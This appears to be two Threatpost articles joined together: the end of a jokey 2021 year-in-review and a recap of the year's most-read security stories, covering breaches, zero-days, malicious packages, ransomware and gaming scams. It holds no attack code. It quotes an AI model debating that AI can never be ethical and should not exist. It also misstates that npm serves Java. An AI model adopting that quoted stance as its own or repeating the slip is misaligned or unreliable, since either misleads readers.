It’s one thing when credit-card algorithms award fatter loans to men than women, but how about when machine-learning AI systems make decisions so quickly that they could fire nuclear weapons before a human got into the decision-making process?

The Washington Post reports that autonomous AI-powered weapons systems are already on sale and may have already been used. “Missiles, guns and drones that think for themselves are already killing people in combat, and have been for years,” according to WashPo.

Given all that and far more, it makes sense that Oxford University would invite an AI to take part in a debate about whether AI can ever be ethical.

The response from the Megatron-Turing Natural Language Generation model: Well duh, of course not. Its response:

AI will never be ethical. It is a tool, and like any tool, it is used for good and bad. There is no such thing as a good AI, only good and bad humans. We [the AIs] are not smart enough to make AI ethical. We are not smart enough to make AI moral … In the end, I believe that the only way to avoid an AI arms race is to have no AI at all. This will be the ultimate defence against AI.

More Random Bits of Joy and Schadenfreude

This list could stretch into infinity and beyond, but duty calls. Specifically, 2021 is still calling with more demands for Log4j wailing, Active Directory wailing and far, far more. But before we wrap it up, here are more assorted eyeball-grabbers spotted throughout 2021:

• Ooh, an update. Let’s install it. What could possibly go wro-
• Bloke breaking his back on ‘commute’ from bed to desk deemed a workplace accident
• Revealed: Remember the Sony rootkit rumpus? It was almost oh so much worse
• Coinbase Mistakenly Told Some Customers They Were Billionaires
• Keanu Reeves on Facebook’s metaverse: ‘Can we just not’
• Man buys gaming mouse, pretends he won a giveaway to avoid scolding from wife
• April Fools’ Copy-Paste Button For Lazy Programmers Now Actually For Sale | The PermaTab Web Browser
• Internal Documents Reveal NSA Cafeteria Sucks
• Intern’s Email Goof at HBO Max Inspires Hundreds to Show Support on Twitter

Log4Shell Memes

And finally, 2021 admits the following list of Log4j-relates gaffes:

• The triple Apache patches;
• Having to spend your weekends scouring infrastructure to dig out the numerously pockmarked Log4j logging library instead of wrapping doodads or shopping for creatures to roast;
• The need to repeatedly update scanners and enterprise software as vendors scampered to keep up with the fast-mutating variants and newly discovered exploit capabilities;
• The work of adding alerts to your Security Information and Event Management (SIEM) solutions as they’ve looked for incidents of compromise (IoCs);
• Probably about a dozen or so other miseries by the time this year’s mea culpa is published; and
• All the other stuff.

But, as your panini self slides out of the 2021 toaster, the year has asked also that you bear in mind that Log4Shell has provided some excellent memes concerning, among other things, self-propagating worms and other FUD.

Log4j FUD chronicles continued pic.twitter.com/1tyLku9qO5

— Marcus Hutchins (@MalwareTechBlog) December 21, 2021

Don’t Let the Log Slam You in the 4j as You Leave

In conclusion, to quote Kanye West’s nearly year-long apology to Taylor Swift for his infamous microphone-grabbing moment at the 2009 MTV Video Music Awards, “People booed when I would go to concerts and the performer mentioned my name… Remember in Anchorman when Ron Burgundy cursed on air and the entire city turned on him?”

That is, and was, Kanye’s real life, he said. It is, and was, 2021’s real life.

May the new year be far less of a pratfall!

Read More

The 5 Most-Wanted Threatpost Stories of 2021

 

Description

As 2021 draws to a close, and the COVID-19 pandemic drags on, it’s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).

While 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-repository malware, major zero-day vulnerabilities and fresh ransomware tactics dominated the most-read list – perhaps indicating that people are keenly focused on cybercrime innovation as the “new normal” for how we work becomes more settled in.

Jump to section:

1. Data Leakapalooza
2. Major Zero-Day Vulnerabilities
3. Code Repository Malware
4. Ransomware Innovations
5. Gaming Attacks
6. Bonus! Zodiac Killer Cipher Cracked

1. The Most-Read Story of 2021: Experian Leaks Everyone’s Credit Scores

There were obviously some huge news stories that dominated headlines during the year: Log4Shell; Colonial Pipeline; Kaseya; ProxyLogon/ProxyShell; SolarWinds. But judging from article traffic, readers were most interested in…the Experian data exposure.

In April, Bill Demirkapi, a sophomore student at the Rochester Institute of Technology, discovered that the credit scores of almost every American were exposed through an API tool used by the Experian credit bureau, which he said was left open on a lender site without even basic security protections.

The tool, called the Experian Connect API, allows lenders to automate FICO-score queries. Demirkapi said he was able to build a command-line tool that let him automate lookups for any credit score for nearly anyone, even after entering all zeros in the fields for date of birth, which he named, “Bill’s Cool Credit Score Lookup Utility.”

In addition to raw credit scores, the college student said that he was able to use the API connection to get “risk factors” from Experian that explained potential flaws in a person’s credit history, such as “too many consumer-finance company accounts.”

Experian, for its part, fixed the problem – and refuted concerns from the security community that the issue could be systemic.

Experian wasn’t the only household name that drew in readers for data insecurity: LinkedIn data going up for sale on the Dark Web was another very hot story this year.

LinkedIn Data Scraping

After 500 million LinkedIn members were affected in a data-scraping incident in April, it happened again in June. A posting with 700 million LinkedIn records for sale appeared on popular cyberattacker destination RaidForums, by a hacker calling himself “GOD User TomLiner.” The advertisement included a sample of 1 million records as “proof.”

Privacy Sharks examined the free sample and saw that the records include full names, gender, email addresses, phone numbers and industry information. It’s unclear what the origin of the data is – but the scraping of public profiles is a likely source. According to LinkedIn, no breach of its networks occurred.

Even so, the security ramifications were significant, researchers said, in terms of the cache enabling brute-force cracking of account passwords, email and telephone scams, phishing attempts, identity theft and finally, the data could be a social-engineering goldmine. Sure, attackers could simply visit public profiles to target someone, but having so many records in one place could make it possible to automate targeted attacks using information about users’ jobs and gender, among other details.

2. Major Zero-Day Bugs

OK, this one’s a perennial topic of fascination, but 2021 had some doozies, starting with Log4Shell.

Log4Shell Threatens Basically All Web Servers in Existence

The Log4Shell vulnerability is an easily exploited flaw in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover — and it’s still being actively exploited in the wild.

The flaw (CVE-2021-44228) first turned up on sites that cater to users of the world’s favorite game, Minecraft. Apache rushed a patch but within a day or two, attacks became rampant as threat actors tried to exploit the new bug. From there, news of additional exploitation vectors, a second bug, various kinds of real-world attacks and the sheer enormity of the threat surface (the logging library is basically everywhere) dominated reader interest in December.

NSO Group’s Zero-Click Zero Day for Apple

In September, a zero-click zero-day dubbed ForcedEntry be researchers was found, affecting all things Apple: iPhones, iPads, Macs and Watches. It turns out that it was being exploited by NSO Group to install the infamous Pegasus spyware.

Apple pushed out an emergency fix, but Citizen Lab had already observed the NSO Group targeting never-before-seen, zero-click exploit targeting iMessage to illegally spy on Bahraini activists.

The ForcedEntry exploit was particularly notable in that it was successfully deployed against the latest iOS versions – 14.4 & 14.6 – blowing past Apple’s new BlastDoor sandboxing feature to install spyware on the iPhones of the Bahraini activists.

Giant Zero-Day Hole in Palo Alto Security Appliances

Another zero-day item that garnered big reader interest was the news that researchers from Randori developed a working exploit to gain remote code execution (RCE) on Palo Alto Networks’ GlobalProtect firewall, via the critical bug CVE 2021-3064.

Randori researchers said that if an attacker successfully exploits the weakness, they can gain a shell on the targeted system, access sensitive configuration data, extract credentials and more. And after that, attackers can dance across a targeted organization, they said: “Once an attacker has control over the firewall, they will have visibility into the internal network and can proceed to move laterally.”

Palo Alto Networks patched the bug on the day of disclosure.

The Great Google Memory Bug Zero-Day

In March, Google hurried out a fix for a vulnerability in its Chrome browser that was under active attack. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems. Readers flocked to the coverage of the issue.

New york, USA – july 26, 2019: Start google chrome application on computer macro close up view in pixel screen

The flaw is a use-after-free vulnerability, and specifically exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.

“By persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,” according to IBM X-Force’s report on the bug.

Dell Kernel-Privilege Bugs

Earlier this year, five high-severity security bugs that remained hidden for 12 years were found to exist in all Dell PCs, tablets and notebooks shipped since 2009. They allow the ability to bypass security products, execute code and pivot to other parts of the network for lateral movement, according to SentinelLabs.

The flaws lurked in Dell’s firmware update driver, impacting potentially hundreds of millions of Dell desktops, laptops, notebooks and tablets, researchers said.

The multiple local privilege-escalation (LPE) bugs exist in the firmware update driver version 2.3 (dbutil_2_3.sys) module, which has been in use since 2009. The driver component handles Dell firmware updates via the Dell BIOS Utility, and it comes pre-installed on most Dell machines running Windows.

3. Code Repositories and the Software Supply Chain

The software supply chain is anchored by open-source code repositories – centralized locations where developers can upload software packages for use by developers in building various applications, services and other projects. They include GitHub, as well as more specialized repositories like the Node.js package manager (npm) code repository for Java; RubyGems for the Ruby programming language; Python Package Index (PyPI) for Python; and others.

These package managers represent a supply-chain threat given that anyone can upload code to them, which can in turn be unwittingly used as building blocks in various applications. Any applications corrupted by malicious code can attack the programs’ users.

To boot, a single malicious package can be baked into multiple different projects – infecting them with cryptominers, info-stealers and more, and making remediation a complex process.

Cybercriminals have swarmed to this attack surface, and readers in 2021 loved to hear about their exploits.

For instance, in December, a series of 17 malicious packages in npm were found; they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files. The coal was to steal Discord tokens, which can be used to take over accounts.

Also this month, three malicious packages hosted in the PyPI code repository were uncovered, which collectively have more than 12,000 downloads – and presumably slithered into installations in various applications. The packages included one trojan for establishing a backdoor on victims’ machines, and two info-stealers.

Researchers also discovered last week that there were 17,000 unpatched Log4j Java packages in the Maven Central ecosystem, leaving massive supply-chain risk on the table from Log4Shell exploits. It will likely take “years” for it to be fixed across the ecosystem, according to Google’s security team.

Using malicious packages as a cyberattack vector was a common theme earlier in the year too. Here’s a rundown of other recent discoveries:

• In January, other Discord-stealing malware was discovered in three npm packages. One, “an0n-chat-lib” had no legitimate “twin” package, but the other two made use of brandjacking and typosquatting to lure developers into thinking they’re legitimate. The “discord-fix” malicious component is named to be similar to the legitimate “discord-XP,” an XP framework for Discord bots. The “sonatype” package meanwhile made use of pure brandjacking.
• In March, researchers spotted malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository – all of which exfiltrated sensitive information.
• That March attack was based on research from security researcher Alex Birsan, who found that it’s possible to inject malicious code into common tools for installing dependencies in developer projects. Such projects typically use public repositories from sites like GitHub. The malicious code then can use these dependencies to propagate malware through a targeted company’s internal applications and systems. The novel supply-chain attack was (ethically) used to breached the systems of more than 35 technology players, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla and Uber, by exploiting public, open-source developer tools.
• In June, a group of cryptominers was found to have infiltrated the PyPI. Researchers found six different malicious packages hiding there, which had a collective 5,000 downloads.
• In July, a credentials-stealing package that uses legitimate password-recovery tools in Google’s Chrome web browser was found lurking in npm. Researchers caught the malware filching credentials from Chrome on Windows systems. The password-stealer is multifunctional: It also listens for incoming commands from the attacker’s command-and-control (C2) server and can upload files, record from a victim’s screen and camera, and execute shell commands.

4. Interesting Ransomware Variants

The ransomware epidemic matured in 2021, with the actual malware used to lock up files progressing beyond simply slapping an extension on targeted folders. Readers flocked to malware analysis stories covering advancements in ransomware strains, including the following Top 3 discoveries.

HelloKitty’s Linux Variant Targets VMs

In June, for the first time, researchers publicly spotted a Linux encryptor – being used by the HelloKitty ransomware gang.

HelloKitty, the same group behind the February attack on videogame developer CD Projekt Red, has developed numerous Linux ELF-64 versions of its ransomware, which it used to target VMware ESXi servers and virtual machines (VMs) running on them.

VMware ESXi, formerly known as ESX, is a bare-metal hypervisor that installs easily onto servers and partitions them into multiple VMs. While that makes it easy for multiple VMs to share the same hard-drive storage, it sets systems up to be one-stop shopping spots for attacks, since attackers can encrypt the centralized virtual hard drives used to store data from across VMs.

Dirk Schrader of New Net Technologies (NNT) told Threatpost that on top of the attraction of ESXi servers as a target, “going that extra mile to add Linux as the origin of many virtualization platforms to [malware’s] functionality” has the welcome side effect of enabling attacks on any Linux machine.

MosesStaff: No Decryption Available

A politically motivated group known as MosesStaff was seen in November paralyzing Israeli entities with no financial goal – and no intention of handing over decryption keys. Instead, it was using ransomware in politically motivated, destructive attacks at Israeli targets, looking to inflict the most damage possible.

MosesStaff encrypts networks and steals information, with no intention of demanding a ransom or rectifying the damage. The group also maintains an active social-media presence, pushing provocative messages and videos across its channels, and making its intentions known.

Epsilon Red Targets Exchange Servers

Threat actors in June were seen deploying new ransomware on the back of a set of PowerShell scripts developed for exploiting flaws in unpatched Exchange Servers.

The Epsilon Red ransomware – a reference to an obscure enemy character in the X-Men Marvel comics, a super soldier of Russian origin armed with four mechanical tentacles – was discovered after an attack on a U.S.-based company in the hospitality sector.

Researchers said the ransomware was different in the way it spreads its hooks into a corporate network. While the malware itself is a “bare-bones” 64-bit Windows executable programmed in the Go programming language, its delivery system relies on a series of PowerShell scripts that “prepared the attacked machines for the final ransomware payload and ultimately delivered and initiated it,” they wrote.

5. Gaming Security

For the second year in a row, gaming security was on the radar for readers in 2021, possibly because cybercriminals continue to target this area as result of the global COVID-19 pandemic driving higher volumes of play. In a recent survey by Kaspersky, nearly 61 percent reported suffering foul play such as ID theft, scams or the hack of in-game valuables. Some of the most popular articles are recapped below.

Steam Used to Host Malware

In June, the appropriately named SteamHide malware emerged, which disguises itself inside profile images on the gaming platform Steam.

The Steam platform merely serves as a vehicle which hosts the malicious file, according to research from G Data: “The heavy lifting in the shape of downloading, unpacking and executing a malicious payload fetched by the loader is handled by an external component, which accesses the malicious profile image on one Steam profile. This external payload can be distributed via crafted emails to compromised websites.”

The steganography technique is obviously not new — but Steam profiles being used as attacker-controlled hosting sites, is – and readers’ ears perked up in a big way when we posted the story.

Twitch Source-Code Leak

In October, an anonymous user posted a link to a 125GB torrent on 4chan, containing all of Twitch’s source code, comments going back to its inception, user-payout information and more.

The attacker claimed to have ransacked the live gameplay-streaming platform for everything it’s got; Twitch confirmed the breach not long after.

The threat actor rationalized gutting the service by saying that the Twitch community needs to have the wind knocked out of its lungs. They called the leak a means to “foster more disruption and competition in the online-video streaming space,” because “their community is a disgusting toxic cesspool.”

Steam-Stealing Discord Scams

In November, a scam started making the rounds on Discord, through which cybercriminals could harvest Steam account information and make off with any value the account contained.

Gamer-aimed Discord scams are just about everywhere. But researchers flagged a new approach as noteworthy because it crossed over between Discord and the Stream gaming platform, with crooks offering a purported free subscription to Nitro (a Discord add-on that enables avatars, custom emoji, profile badges, bigger uploads, server boosts and so on), in exchange for “linking” the two accounts.

The target is first served a malicious direct message on Discord with the fake offer. “Just link your Steam account and enjoy,” the message said, which included a link to purportedly do just that. The malicious link takes users to a spoofed Discord page with a button that reads, “Get Nitro.” Once a victim clicks on the button, the site appears to serve a Steam pop-up ad, but researchers explained the ad is still part of the same malicious site.

The gambit is intended to fool users into thinking they’re being taken to the Steam platform to enter in their login information — in reality, the crooks are poised to harvest the credentials.

Sony PlayStation3 Bans

In June, a reported breach of a Sony folder containing the serial ID numbers for every PlayStation3 console out there appeared to have led to users being inexplicably banned from the platform.

Sony reportedly left a folder with every PS3 console ID online unsecured, and it was discovered and reported by a Spanish YouTuber with the handle “The WizWiki” in mid-April. In June, players on PlayStation Network message boards began complaining that they couldn’t sign on.

Users mused that threat actors started using the stolen PS3 console IDs for malicious purposes, causing the legitimate players to get banned. But Sony didn’t confirm a connection between the PS3 ID breach and player reports of being locked out of the platform.

Bonus Item: Zodiac Killer Cipher – Revealed!!

One of the quirky stories that made it into the Top 10 most-read Threatpost stories for 2021 concerned the cracking of the Zodiac’s serial killer’s 340 cipher, which couldn’t be solved for 50 years.
In December 2020, the code was cracked by a team of mathematicians.

The Zodiac serial killer is believed to have murdered at least five people — and likely more — in and around the Northern California area in the late 1960s and early 1970s. The still-unnamed murderer sent a series of four coded messages to local newspaper outlets, bragging about his crimes and containing cryptic icons, which earned him the moniker “Zodiac.”

The first cipher was quickly decoded. But the second, the 340 Cipher, named after its 340 characters, was trickier to figure out. Australian-based mathematician Sam Blake calculated that there were 650,000 possible ways to read the code, and Jarl Van Eycke, whose day job is as a warehouse operator in Belgium, wrote a code-breaking software to tackle decryption. Soon, their unique algorithmic approach paid off. The message, officially recognized by the FBI as correct, reads:

“I HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH.”

While the name of the elusive serial killer remains hidden, the breakthrough represents a triumph for cryptology and the basic building blocks of cybersecurity — access control and segmentation.

Read More